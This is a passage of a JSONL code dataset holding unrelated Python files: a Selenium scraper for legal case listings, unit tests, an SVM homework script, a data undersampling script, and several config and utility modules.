main()\n","sub_path":"topocreatedcell.py","file_name":"topocreatedcell.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"404632784","text":"# importing required modules\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\n# method to wait until some element shows its presence on web page\ndef wait(browser, x):\n    element = WebDriverWait(browser, 20).until(EC.presence_of_element_located((By.XPATH, x)))\n    return element\n# method to visit each case url on a single page\ndef find_and_write():\n    # getting link headings of each case\n    heading = len(browser.find_elements_by_xpath(\"//h4[@class='title media-heading']/a\"))\n    # open file in append\n    writer = open('case.txt', 'a')\n    # visit each url, fetch data, and return to the previous page for the next url\n    for head in range(heading):\n        # waiting for link to be clickable\n        wait(browser, \"//h4[@class='title media-heading']/a\")\n        # writing heading of cases and visit the case\n        writer.write(browser.find_elements_by_xpath(\"//h4[@class='title media-heading']/a\")[head].text)\n        browser.find_elements_by_xpath(\"//h4[@class='title media-heading']/a\")[head].click()\n        # writing all details to text file\n        alldetail = browser.find_elements_by_css_selector('td')\n        i = 0\n        for detail in alldetail:\n            i += 1\n            writer.write(detail.text)\n            if i % 2:\n                writer.write('\\n')\n        data = browser.find_elements_by_xpath(\"//div[@class='table-bordered']\")\n        for paragraph in data:\n            writer.write(paragraph.text)\n        browser.back()\n        writer.write('\\n\\n')\n    # closing file after finishing\n    writer.close()\n\n# enter keyword to be searched\nkeyword = input(\"enter keyword to be searched : \")\n# open website in chrome\nbrowser = webdriver.Chrome(executable_path='C:\\\\Users\\\\tej\\\\PycharmProjects\\\\chromedriver.exe')\nbrowser.get('https://www.legalcrystal.com/')\n# enter in search bar and search\nsearchbar = browser.find_element_by_id('JudgementName')\nsearchbar.send_keys(keyword)\nsearchbar.submit()\n# creating file in same directory\nwriter = open('case.txt', 'w')\nwriter.close()\n# for checking if url changes\nc_url = browser.current_url\n# for loop for going on next page\nfor x in range(100):\n    # calling method for entering into url and fetching data\n    find_and_write()\n    # going on next page\n    nxt = browser.find_element_by_xpath(\"//li[@class='next']/a\")\n    nxt.click()\n    # waiting till loading of page\n    while c_url == browser.current_url:\n        time.sleep(20)\n    time.sleep(20)\n    # changing current url\n    c_url = browser.current_url\n","sub_path":"LawCases.py","file_name":"LawCases.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"307139424","text":"# coding=utf-8\nfrom count import Calculator\nimport unittest\n\n\n# test classes must inherit from unittest.TestCase\nclass TestAdd(unittest.TestCase):\n\n    # executed before every test case\n    def setUp(self):\n        print(\"start test:\")\n        #dr = webdriver.Firefox()\n        #initialize API test data, base_url\n\n    # executed after every test case\n    def tearDown(self):\n        print(\"end test.\")\n        #dr.quit()\n\n    # test method names must start with \"test\"\n    def test_add(self):\n        c = Calculator(3, 5)\n        self.assertEqual(c.add(), 8)\n        print(\"add\")\n\n    def test_add2(self):\n        c = Calculator(3, 5)\n        self.assertEqual(c.add(), 8)\n        print(\"add2\")\n\n\nif __name__ == \"__main__\":\n    #unittest.main() # in what order are the cases executed? \n    \n    # test suite: runs a group of tests as a collection\n    suit = unittest.TestSuite()\n    suit.addTest(TestAdd(\"test_add2\"))\n    suit.addTest(TestAdd(\"test_add\"))\n    \n    runner = unittest.TextTestRunner()\n    runner.run(suit)\n\n","sub_path":"guest/test_demo/test_case/test_add.py","file_name":"test_add.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"480584290","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nProject Euler Problem 103\n=======================\n\nLet S(A) represent the sum of elements in set A of size n. We shall call\nit a special sum set if for any two non-empty disjoint subsets, B and C,\nthe following properties are true:\n\n 1. S(B) ≠ S(C); that is, sums of subsets cannot be equal.\n 2. If B contains more elements than C then S(B) > S(C).\n\nIf S(A) is minimised for a given n, we shall call it an optimum special\nsum set. The first five optimum special sum sets are given below.\n\nn = 1: {1}\nn = 2: {1, 2}\nn = 3: {2, 3, 4}\nn = 4: {3, 5, 6, 7}\nn = 5: {6, 9, 11, 12, 13}\n\nIt seems that for a given optimum set, A = {a[1], a[2], ... , a[n]}, the\nnext optimum set is of the form B = {b, a[1]+b, a[2]+b, ... ,a[n]+b},\nwhere b is the \"middle\" element on the previous row.\n\nBy applying this \"rule\" we would expect the optimum set for n = 6 to be A\n= {11, 17, 20, 22, 23, 24}, with S(A) = 117. However, this is not the\noptimum set, as we have merely applied an algorithm to provide a near\noptimum set. The optimum set for n = 6 is A = {11, 18, 19, 20, 22, 25},\nwith S(A) = 115 and corresponding set string: 111819202225.\n\nGiven that A is an optimum special sum set for n = 7, find its set string.\n\nNOTE: This problem is related to problems 105 and 106.\n\n\"\"\"\n\n\ndef main():\n    return \"unimplemented\"\n\n\nif __name__ == \"__main__\":\n    import ntpath\n    import time\n    from common.shared_functions import verify_solution\n\n    problem_number = int(ntpath.basename(__file__).replace(\"euler\", \"\").replace(\".py\", \"\"))\n    print(\"Retrieving my answer to Euler Problem {0} ...\".format(problem_number))\n\n    ts = time.time()\n    my_answer = main()\n    te = time.time()\n\n    print(\"My answer: {0}\".format(my_answer))\n\n    verification_type = verify_solution(problem_number, my_answer)\n    print(\"Verification: {0}\".format(verification_type.name))\n    print(\"Took {0} seconds.\".format(te - ts))\n","sub_path":"project-euler/solvers/euler103.py","file_name":"euler103.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"376189815","text":"#! 
/usr/bin/env python\n\n\"\"\"\nRuns Packet tests.\n\nRevision Info\n=============\n* $LastChangedBy: mandke $\n* $LastChangedDate: 2010-10-19 16:34:02 -0500 (Tue, 19 Oct 2010) $\n* $LastChangedRevision: 4811 $\n\n:author: Ketan Mandke \n\n:copyright:\n Copyright 2009 The University of Texas at Austin\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n__docformat__ = \"restructuredtext en\"\n\nimport unittest\n\nfrom scapy.all import *\nfrom wins import *\nfrom copy import copy, deepcopy\n\nclass TestPacket(unittest.TestCase):\n\n def setUp(self):\n Trace.Global.reset()\n\n def not_test_001(self):\n p = Packet()\n h = Raw(\"helloworld\")\n h.setanno(\"x\", 100)\n r = TCP()/h\n s = TCP()/h\n s.setanno(\"x\", 50)\n r.setanno(\"foo\", s, ref=True)\n foo = r.getanno(\"foo\")\n self.assertFalse(isinstance(foo, Reference), \"setanno() error!\")\n self.assertTrue(foo==s,\"getanno() error!\")\n self.assertTrue(foo is s,\"getanno() error!\")\n t = copy(r)\n u = deepcopy(s)\n self.assertEqual(t._id, r._id, \"packet copy() error!\")\n self.assertEqual(u._id, s._id, \"packet deepcopy() error!\")\n self.assertFalse(t is r, \"packet copy() error!\")\n self.assertTrue(t == r, \"packet copy() error!\")\n self.assertFalse(u == s, \"packet deepcopy() error!\")\n\n def not_test_002(self):\n p = Packet()/\"helloworld\"\n q = Packet()/\"helloworld\"\n p.setanno(\"x\", q, ref=True)\n crcupdate(p)\n s = deepcopy(p)\n\n def test_crc(self):\n p = Packet()/\"helloworld\"\n crcupdate(p)\n p[CRC32].crcerror = 1\n\n","sub_path":"tests/qa_packet.py","file_name":"qa_packet.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"556403503","text":"from random import sample, shuffle\n\ndef parse_credits(filename=\"creditcard_discretised.csv\"):\n\tf = open(filename)\n\tattributes = f.readline().strip().split(\",\")\n\t\n\t#database = [[] for x in classes]\n\tdatabase = []\n\t\n\tmaxlines = float(\"inf\") # 10000 #\n\tfor line in f:\n\t\tline = line.strip().split(\",\")\n\t\tline = [int(x) for x in line]\n\t\t#for i, elem in enumerate(line):\n\t\t#\tdatabase[i].append(elem)\n\t\tdatabase.append(line)\n\t\t\n\t\tif(len(database[0])>=maxlines):\n\t\t\tbreak\n\tf.close()\n\treturn attributes,database\n\t\ndef export_credits(attributes,database,filename=\"creditcard_undersampled.csv\"):\n\t\n\tf = open(filename,\"w\")\n\tf.write(\",\".join((x for x in attributes)))\n\tf.write(\"\\n\")\n\tfor line in database:\n\t\tf.write(\" ,\".join(str(int(x)) for x in line))\n\t\tf.write(\"\\n\")\n\t\t\n\t\n\ndef resample(attributes,database,target):\n\t\"\"\"Undersampling \n\thttps://www.kaggle.com/arathee2/achieving-100-accuracy\n\thttps://www.kaggle.com/joparga3/in-depth-skewed-data-classif-93-recall-acc-now\n\t\"\"\"\n\ttarget_index = attributes.index(target)\n\tpositive = []\n\tnegative = []\n\tfor line in 
database:\n\t\tif(line)[target_index]==1:\n\t\t\tpositive.append(line)\n\t\telse:\n\t\t\tnegative.append(line)\n\tprint(\"Pos:\",len(positive))\n\tprint(\"Neg:\",len(negative))\n\tnegative_undersampled = sample(negative,len(positive))\n\tlines = []\n\tproblems = 0\n\tfor line in negative:\n\t\tfor lane in positive:\n\t\t\tif(line[:target_index]+line[target_index:] == lane[:target_index]+lane[target_index:]):\n\t\t\t\tif(line not in lines):\n\t\t\t\t\tprint(\"Ligne à problème:\\n\",database.index(line),line,\"\\n\",database.index(lane),lane)\n\t\t\t\t\tlines.append(line)\n\t\t\t\tproblems+=1\n\tprint(\"Problèmes:\",len(lines))\n\tprint(\"Lignes à problèmes:\",problems)\n\tdatabase = negative_undersampled+positive\n\tshuffle(database)\n\tprint(\"Und:\",len(database))\n\treturn database\n\natt,dat = parse_credits()\ndat=resample(att,dat, \"Class\")\nexport_credits(att,dat)\n","sub_path":"Parse_big_data/parse_discrete_to_undersample.py","file_name":"parse_discrete_to_undersample.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"84895805","text":"import sys\nimport numpy as np\nimport cvxopt\nfrom cvxopt import matrix\nimport csv\nimport time\nimport sklearn.metrics\n\ntrain_file = sys.argv[1]\ntest_file = sys.argv[2]\nbinary_multi = sys.argv[3]\npart_num = sys.argv[4]\n\n# Constants\nd1 = 3\nd2 = (d1+1)%10\nn = 28*28\nC = 1.0\nm = 0\nEPS = 1e-5\ngamma = 0.05\n\ndef read_input(file):\n\t# input\n\tx = []\n\ty = []\n\twith open(file, 'r') as csvfile:\n\t\treader = csv.reader(csvfile)\n\n\t\tlimit = 0\n\t\tfor row in reader:\n\t\t\tlimit += 1\n\n\t\t\t# -------- debug ----------\n\t\t\t# if limit == 100:\n\t\t\t# \tbreak\n\t\t\t# -------------------------\n\n\t\t\tlabel = int(row[n])\n\t\t\tif (label == d1 or label == d2):\n\t\t\t\ty.append(1 if label == d1 else -1)\n\t\t\t\txl = []\n\t\t\t\tfor i in range(n):\n\t\t\t\t\txl.append(float(row[i]) / 255.0)\n\t\t\t\tx.append(xl)\n\tx = np.array(x)\n\ty = np.array(y)\n\treturn (x,y)\n\ndef gauss_K(x,z):\n\tnorm = np.linalg.norm(x-z)\n\treturn np.exp(-gamma * norm * norm)\n\ndef gaussian_kernal(x):\n\treturn np.asarray([ [ gauss_K(i,j) for j in x ] for i in x ])\n\t# return sklearn.metrics.pairwise.rbf_kernel(x, Y=None, gamma=gamma)\n\ndef find_matrices(x,y,C,part_num):\n\t# print(x.shape, y.shape, C)\n\tA = matrix(y.T, tc='d')\n\tb = matrix(0.0)\n\t\n\ti_ar = np.identity(m)\n\tG = matrix(np.concatenate((i_ar,-i_ar), axis=0), tc='d')\n\t\n\th_ar = np.zeros(2*m)\n\th_ar[0:m] = C\n\th = matrix(h_ar, tc='d')\n\t\n\tq = matrix(-np.ones(m), tc='d')\n\n\tif part_num == 0:\n\t\tP = matrix(np.multiply(x @ x.T, y @ y.T), tc='d')\n\telse:\n\t\tP = matrix(np.multiply(gaussian_kernal(x), y @ y.T), tc='d')\n\t\n\t# print(P.size, q.size, G.size, h.size, A.size, b.size)\n\treturn (P,q,G,h,A,b)\n\n\n# ------------ part_a -----------------------\n\ndef part_a():\n\t# ------------- training: ---------------\n\tstart_time = time.time()\n\n\t(x,y) = read_input(train_file)\n\ty = y[:,np.newaxis]\n\tglobal m\n\tm = y.shape[0]\n\t(P,q,G,h,A,b) = find_matrices(x,y,C,0)\n\tcvxopt.solvers.options['show_progress'] = False\n\tsol = cvxopt.solvers.qp(P,q,G,h,A,b)\n\talpha = sol['x']\n\tsv_cnt = 0\n\tone_sv = -1\n\tw = np.zeros((n,1))\n\t# List of indices of support vectors\n\tInd_SV = [index for index, ele in enumerate(alpha) if ele > EPS]\n\tsv_cnt = len(Ind_SV)\n\n\tfor i in Ind_SV:\n\t\tx_i = x[i].T.reshape((n,1))\n\t\tw += alpha[i] * y[i] * x_i\n\t\tif (alpha[i] < C - 
EPS):\n\t\t\tone_sv = i\n\t\t\t\n\tif(one_sv == -1):\n\t\tprint(\"Error!\")\n\n\tprint(\"Number of Support Vectors:\",sv_cnt)\n\t# print(\"Support Vectors:\", Ind_SV)\n\tb = y[one_sv] - w.T @ x[one_sv]\n\tprint(\"Bias:\",b)\n\t# print(\"Weights:\",w)\n\n\tend_time = time.time()\n\tprint(\"Training time:\", end_time - start_time)\n\n\t# ------------- testing: ---------------\n\tcorrect_pred_cnt = 0\n\t(x_test,y_test) = read_input(test_file)\n\n\ty_pred = np.zeros(y_test.shape)\n\n\tfor i in range(y_test.shape[0]):\n\t\ty_pred[i] = 1 if w.T @ x_test[i] + b > 0 else -1\n\t\tif(y_pred[i] == y_test[i]):\n\t\t\tcorrect_pred_cnt += 1\n\n\tprint(\"accuracy:\", 100.0 * (correct_pred_cnt / y_test.shape[0]))\n\n\n# ------------ part_b -----------------------\n\ndef part_b():\n\t# ------------- training: ---------------\n\tstart_time = time.time()\n\n\t(x,y) = read_input(train_file)\n\ty = y[:,np.newaxis]\n\tglobal m\n\tm = y.shape[0]\n\n\t(P,q,G,h,A,b) = find_matrices(x,y,C,1)\n\tcvxopt.solvers.options['show_progress'] = False\n\tsol = cvxopt.solvers.qp(P,q,G,h,A,b)\n\talpha = sol['x']\n\talpha = np.array(alpha)\n\t\n\t# Saving alpha:\n\t# alnp = np.array(alpha)\n\t# np.save(\"save\", alnp)\n\t\n\t# Loading alpha:\n\t# alpha = np.load(\"save.npy\")\n\n\tsv_cnt = 0\n\tone_sv = -1\n\t# print(\"m:\",m)\n\t# print(alpha)\n\n\t# List of indices of support vectors\n\tInd_SV = [index for index, ele in enumerate(alpha) if ele > EPS]\n\tsv_cnt = len(Ind_SV)\n\n\tprint(\"Number of Support Vectors:\",sv_cnt)\n\t# Finding one SV with 0 < alpha < C\n\tfor i in Ind_SV:\n\t\tif (alpha[i] < C - EPS):\n\t\t\tone_sv = i\n\t\t\tbreak\n\n\tif(one_sv == -1):\n\t\tprint(\"Error!\")\n\n\tb = float(y[one_sv])\n\tfor i in Ind_SV:\n\t\tb -= alpha[i][0] * y[i][0] * gauss_K(x[i], x[one_sv])\n\tprint(\"Bias:\",b)\n\t# print(\"Indices of Support Vectors:\",Ind_SV)\n\t# Finding x,y,alpha for indices of Support Vectors\n\txSV = x[Ind_SV,:]\n\tySV = y[Ind_SV,:]\n\talphaSV = alpha[Ind_SV,:]\n\n\tend_time = time.time()\n\tprint(\"Training Time:\", end_time - start_time)\n\n\t# ------------- testing: ---------------\n\tcorrect_pred_cnt = 0\n\t(x_test,y_test) = read_input(test_file)\n\n\t# using sk-learn gaussian\n\tMAT = sklearn.metrics.pairwise.rbf_kernel(x_test, Y=xSV, gamma=gamma)\n\tvec = np.multiply(alphaSV[:,0], ySV[:,0])\n\tMAT[:,] = np.multiply(MAT[:,], vec)\n\tAmt = np.sum(MAT, axis = 1) + b\n\ty_pred = np.where(Amt > 0, 1, -1)\n\tcorrect_pred_cnt = sum(y_pred == y_test)\n\n\t# without sk-learn gaussian\n\t# print(alphaSV.shape, ySV.shape)\n\tAmt = np.sum(np.asarray([ [ alphaSV[j][0] * ySV[j][0] * gauss_K(xSV[j], x_test[i]) for j in range(xSV.shape[0])] for i in range(x_test.shape[0])]), axis = 1) + b\n\tprint(Amt.shape)\n\ty_pred = np.where(Amt > 0, 1, -1)\n\tcorrect_pred_cnt = sum(y_pred == y_test)\n\n\t# print(y_test.shape[0], correct_pred_cnt)\n\tprint(\"accuracy:\", 100.0 * (correct_pred_cnt / y_test.shape[0]))\n\n\n# ------------ part_c -----------------------\nfrom svmutil import *\n\ndef part_c1():\n\t# ------------- LINEAR ------------------\n\t# ------------- training: ---------------\n\tstart_time = time.time()\n\n\t(x,y) = read_input(train_file)\n\tglobal m\n\tm = y.shape[0]\n\tprob = svm_problem(y, x)\n\tparam = svm_parameter('-t 0 -c 1.0 -q')\n\tmodel = svm_train(prob, param)\n\t\n\talpha = np.asarray(model.get_sv_coef())\n\talpha = alpha[:,0]\n\tInd_SV = np.asarray(model.get_sv_indices()) - 1\n\n\tsv_cnt = len(Ind_SV)\n\tprint(\"Number of Support Vectors:\",sv_cnt)\n\n\t# -----------finding b and 
w---------------\n\tw = np.zeros((n,1))\n\tj = 0\n\tfor i in Ind_SV:\n\t\tx_i = x[i].T.reshape((n,1))\n\t\tw += alpha[j] * y[i] * x_i\n\t\tif (alpha[j] < C - EPS):\n\t\t\tone_sv = i\n\t\tj+=1\n\t\t\t\n\tif(one_sv == -1):\n\t\tprint(\"Error!\")\n\n\t# print(\"Indices of Support Vectors:\",Ind_SV)\n\tb = y[one_sv] - w.T @ x[one_sv]\n\t# print(\"Bias:\",b)\n\t# print(\"Weights:\",w)\n\n\tend_time = time.time()\n\tprint(\"Training Time:\", end_time - start_time)\n\n\t# ------------- testing: ---------------\n\t(x_test,y_test) = read_input(test_file)\n\tp_label,_,_ = svm_predict(y_test, x_test, model, '-q')\n\tACC,_,_ = evaluations(y_test, p_label)\n\n\tprint(\"Accuracy:\", ACC)\n\n\ndef part_c2():\n\t# ------------- GAUSSIAN ------------------\n\t# ------------- training: ---------------\n\tstart_time = time.time()\n\n\t(x,y) = read_input(train_file)\n\tglobal m\n\tm = y.shape[0]\n\tprob = svm_problem(y, x)\n\tparam = svm_parameter('-t 2 -c 1.0 -g 0.05 -q')\n\tmodel = svm_train(prob, param)\n\n\talpha = np.asarray(model.get_sv_coef())\n\talpha = alpha[:,0]\n\tInd_SV = np.asarray(model.get_sv_indices()) - 1\n\n\tsv_cnt = len(Ind_SV)\n\tprint(\"Number of Support Vectors:\",sv_cnt)\t\n\t# np.set_printoptions(threshold=np.nan)\n\t# print(\"Indices of Support Vectors:\",Ind_SV)\n\n\t# ------------- finding b: --------------\n\n\tfor i in range(len(Ind_SV)):\n\t\tif (alpha[i] < C - EPS):\n\t\t\tone_sv = i\n\t\t\tbreak\n\n\tb = float(y[one_sv])\n\tj = 0\n\tfor i in Ind_SV:\n\t\tb -= alpha[j] * y[i] * gauss_K(x[i], x[one_sv])\n\t\tj += 1\n\t\n\t# print(\"Bias:\",b)\n\n\tend_time = time.time()\n\tprint(\"Training Time:\", end_time - start_time)\n\n\t# ------------- testing: ---------------\n\t(x_test,y_test) = read_input(test_file)\n\tp_label,_,_ = svm_predict(y_test, x_test, model, '-q')\n\tACC,_,_ = evaluations(y_test, p_label)\n\n\tprint(\"Accuracy:\", ACC)\n\n# setting print option to a fixed precision\nnp.set_printoptions(precision = 6, suppress = True)\n\nif part_num == 'a':\n\t# start_time = time.time()\n\tpart_a()\n\t# end_time = time.time()\n\t# print(\"Time taken:\", end_time - start_time)\n\nelif part_num == 'b':\n\t# start_time = time.time()\n\tpart_b()\n\t# end_time = time.time()\n\t# print(\"Time taken:\", end_time - start_time)\n\t\nelif part_num == 'c':\n\tprint(\"LibSVM - LINEAR:\")\n\t# start_time = time.time()\n\tpart_c1()\n\t# end_time = time.time()\n\t# print(\"Time taken:\", end_time - start_time, \"\\n\")\n\t\n\tprint(\"LibSVM - GAUSSIAN:\")\n\t# start_time = time.time()\n\tpart_c2()\n\t# end_time = time.time()\n\t# print(\"Time taken:\", end_time - start_time)\n\t\n# ./run.sh 2 \n# Here, 'binary_or_multi_class' is 0 for binary classification and 1 for multi-class. 
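# Illustrative self-check (editor's addition, not part of the original 2.py):
# the hand-rolled gaussian kernel above should agree with scikit-learn's
# rbf_kernel for the same gamma, e.g.:
#   pts = np.random.rand(5, 3)
#   K_manual = np.asarray([[gauss_K(a, b) for b in pts] for a in pts])
#   K_sklearn = sklearn.metrics.pairwise.rbf_kernel(pts, gamma=gamma)
#   assert np.allclose(K_manual, K_sklearn)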
\n# 'part_num' is part number which can be a-c for binary classification and a-d for multi-class.","sub_path":"A2/Submission/2/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":8101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"58665130","text":"# config module\\\\\\\\\\\\# for strxfrm sort\nimport pathlib\nfrom pathlib import Path\nimport json\nfrom abc import ABC, abstractmethod\nfrom .error import ConfigError\nimport logging\n\nlogger = logging.getLogger(__name__)\nconfig_filename = 'keeper-config.json'\n__logging_format__ = \"%(levelname)s: %(message)s by %(module)s.%(funcName)s in %(fileName)s:%(lineno) at %(asctime)s\"\n\n\nclass Config(ABC):\n pass\n\n\nclass Logging(Config):\n level = logging.INFO\n format = \"%(levelname)s: %(message)s by %(module)s.%(funcName)s in %(fileName)s:%(lineno)d at %(asctime)s\"\n #path = '.'\n #filename = 'keeper.log'\n\n def __init__(self, **logging_dict):\n '''Set logging.'level', 'format', 'path', 'filename'\n '''\n sets = {}\n logging_keys = {'level', 'format', 'path', 'filename'}\n for key in logging_keys:\n value = logging_dict.get(key)\n if value:\n level_set = {'DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'}\n if key == 'level' and value not in level_set:\n raise ConfigError(f\"'level' must be in {level_set}\")\n sets[key] = value\n self.config = sets\n return sets\n \n def start(self):\n '''basicConfig starts \n '''\n # fullpath = Path(cls.path) / cls.filename\n # rfHandler = handlers.RotatingFileHandler(fullpath, maxBytes=32768, backupCount=1)\n # cls.formatter = logging.Formatter(cls.format)\n # rfHandler.setFormatter(cls.formatter)\n logging.basicConfig(**self.config) # handlers=[logging.StreamHandler()], \n # logging.info(f\"Logging.basicConfig is set: level={cls.level}, format={cls.formatter.format}, handlers={cls.handlers}.\")\n # return cls.handlers\n\n\nclass Locale(Config):\n LC = 'en_US'\n ENCODING = 'utf8'\n\n def __init__(self, code):\n cl = locale.getlocale()\n lc = code.split('.')[0]\n if lc in locale.locale_aliases().keys():\n self.lc = lc\n else:\n raise ConfigError(\"{lc} is not in the alias list.\")\n\n def start(self):\n locale.setlocale(locale.LC_ALL, '.'.join([self.lc, Locale.ENCODING]))\n\n \n\npager = None\n\nkey_Dict_config_class = {'logging': Logging, 'locale': Locale}\n\n\ndef set_by_json_file(config_filename=config_filename):\n pth = Path(config_filename)\n if pth.exists():\n try: # pick up keys from config.json file\n with open(config_filename) as config_file:\n config_dict = json.load(config_file)\n config_sets = {}\n for k, cls in key_Dict_config_class.items():\n if k in config_dict.keys():\n config_sets[k] = cls(config_dict[k])\n return config_sets\n except json.JSONDecodeError as err: # msg, doc, pos:\n emsg = f\"Error: Unable to parse: {err.doc} ; at {err.pos} ; in JSON file: {config_filename}\"\n logging.error(f\"msg:{err.msg}, doc:{err.doc}, pos:{err.pos}. 
{emsg}\")\n from .error import DecodeError\n raise ConfigError(emsg) from json.JSONDecodeError\n except OSError as e:\n msg = f\"{e.strerror}: Error: Unable to access config file: {config_filename}\"\n logging.error(msg)\n from .error import OSException\n raise ConfigError(msg) from OSError\n except Exception:\n logging.exception('Unknown exception happend.')\n raise\n\n\ndef start(config_set):\n for obj in config_set:\n obj.start()\n ","sub_path":"keepercommander/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"580574014","text":"from typing import Callable, Dict, Any, List, Optional\n\nimport errors\nfrom cogs import errorhandler\nfrom bot import commands, in_prompt\n\n\nclass Stage:\n def __init__(self, func: Callable, handler: Callable, context: commands.Context, stage_num: int = 0):\n self.callback: Callable = func\n self.handler: Callable = handler\n self.ctx: commands.Context = context\n self.branch: str = ''\n self.num: int = stage_num\n self.history: List[int] = [stage_num]\n self.results: Dict[str, Any] = {}\n\n @property\n def path(self):\n return self.branch + str(self.num)\n\n @path.setter\n def path(self, value: str):\n i = value.rfind('.')\n self.branch = value[0:i]\n self.num = int(value[(i + 1):-1])\n\n async def zap(self, stage_num: int, *args, progress_history: bool = True, **kwargs):\n self.num = stage_num\n if progress_history:\n self.history.append(self.num)\n try:\n return (await self.callback(self, *args, **kwargs)) or self.num\n except errors.PromptKilled:\n raise\n except errors.PromptError as e:\n await self.handler(self.ctx, e)\n\n async def to(self, branch: str, stage_num: int = 0, *args, **kwargs):\n self.branch = branch\n return await self.zap(stage_num, *args, **kwargs)\n\n async def back(self, *args, **kwargs):\n self.history.pop(-1)\n await self.zap(self.history[-1], *args, progress_history=False, **kwargs)\n\n async def next(self, increment: Optional[int] = 1, *args, **kwargs):\n await self.zap(self.num + increment, *args, **kwargs)\n\n\ndef prompt(handler=errorhandler.process) -> Callable:\n def decorator(func) -> Callable:\n async def new_func(ctx: commands.Context, *args, stage_num: int = 0, **kwargs):\n try:\n return await func(Stage(func, handler, ctx, stage_num), *args, **kwargs)\n except errors.PromptKilled as e:\n raise e\n except errors.PromptError as e:\n await handler(ctx, e)\n finally:\n in_prompt.pop(ctx.author.id)\n return new_func\n return decorator\n","sub_path":"utils/prompt.py","file_name":"prompt.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"222380480","text":"import os\nimport logging\nimport re\n\nfrom colorama import Fore, init\nfrom configparser import ConfigParser, NoSectionError, NoOptionError\n\n\ninit()\n\n\nclass OptionError(Exception):\n \"\"\"Option error.\"\"\"\n\n\nclass Options:\n _LOADED = False\n _CONFIG_PATH = os.path.normpath(os.path.join(os.path.expanduser('~'), 'vcd-config.ini'))\n\n PRODUCTION = False\n FILENAME_PATTERN = re.compile(\n 'filename=\\\"?([\\w\\s\\-\\!\\$\\?\\%\\^\\&\\(\\)\\_\\+\\~\\=\\`\\{\\}\\[\\]\\.\\;\\'\\,]+)\\\"?')\n ROOT_FOLDER = os.path.normpath(\n os.path.join(os.path.dirname(os.path.dirname(__file__)), 'default_root_folder'))\n\n LOGS_FOLDER = os.path.normpath(os.path.join(os.path.expanduser('~'), 'logs'))\n LOG_PATH = os.path.normpath(os.path.join(LOGS_FOLDER, 
'vcd.log'))\n TIMEOUT = 30\n LOGGING_LEVEL = logging.DEBUG\n\n FORUMS_SUBFOLDERS = True\n\n # Creators\n\n @staticmethod\n def create_root_folder():\n if os.path.isdir(Options.ROOT_FOLDER) is False:\n os.makedirs(Options.ROOT_FOLDER)\n\n @staticmethod\n def create_logs_folder():\n if os.path.isdir(Options.LOGS_FOLDER) is False:\n os.makedirs(Options.LOGS_FOLDER)\n\n # Setters\n\n @staticmethod\n def set_logs_folder(logs_folder):\n Options.LOGS_FOLDER = logs_folder\n Options.create_logs_folder()\n\n @staticmethod\n def set_root_folder(root_folder):\n Options.ROOT_FOLDER = root_folder\n Options.create_root_folder()\n\n @staticmethod\n def set_timeout(timeout: int):\n Options.TIMEOUT = int(timeout)\n\n @staticmethod\n def set_logging_level(logging_level):\n logging_level = logging.getLevelName(logging_level.upper())\n if not isinstance(logging_level, int):\n raise ValueError(f'Invalid log level: {logging_level!r}')\n\n Options.LOGGING_LEVEL = logging_level\n\n @staticmethod\n def set_forums_subfolders(forums_subfolders):\n if not isinstance(forums_subfolders, bool):\n raise TypeError(\n f'forums_subfolders must be bool, not {type(forums_subfolders).__name__}')\n\n Options.FORUMS_SUBFOLDERS = forums_subfolders\n\n @staticmethod\n def load_config():\n if Options._LOADED:\n return\n\n Options._LOADED = True\n config = ConfigParser()\n config.read(Options._CONFIG_PATH)\n try:\n Options.set_root_folder(config.get('options', 'root_folder'))\n Options.set_timeout(config.get('options', 'timeout'))\n Options.set_logs_folder(config.get('options', 'log_folder'))\n Options.set_logging_level(config.get('options', 'logging_level'))\n Options.set_forums_subfolders(config.getboolean('options', 'forums_subfolders'))\n\n except (NoSectionError, NoOptionError):\n config['options'] = {\n 'root_folder': Options.ROOT_FOLDER,\n 'timeout': '30', 'log_folder': Options.LOGS_FOLDER,\n 'logging_level': logging.getLevelName(Options.LOGGING_LEVEL),\n 'forums_subfolders': Options.FORUMS_SUBFOLDERS\n }\n with open(Options._CONFIG_PATH, 'wt', encoding='utf-8') as fh:\n config.write(fh)\n\n return exit(Fore.RED + 'Invalid Options' + Fore.RESET)\n\n\nOptions.load_config()\nOptions.create_root_folder()\n","sub_path":"vcd/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"132682889","text":"from django.db import models\nfrom datetime import date\nimport pandas as pd\n\nclass ResourceType(models.Model):\n name = models.CharField(max_length=32, blank=False, null=False)\n\n def __str__(self):\n return 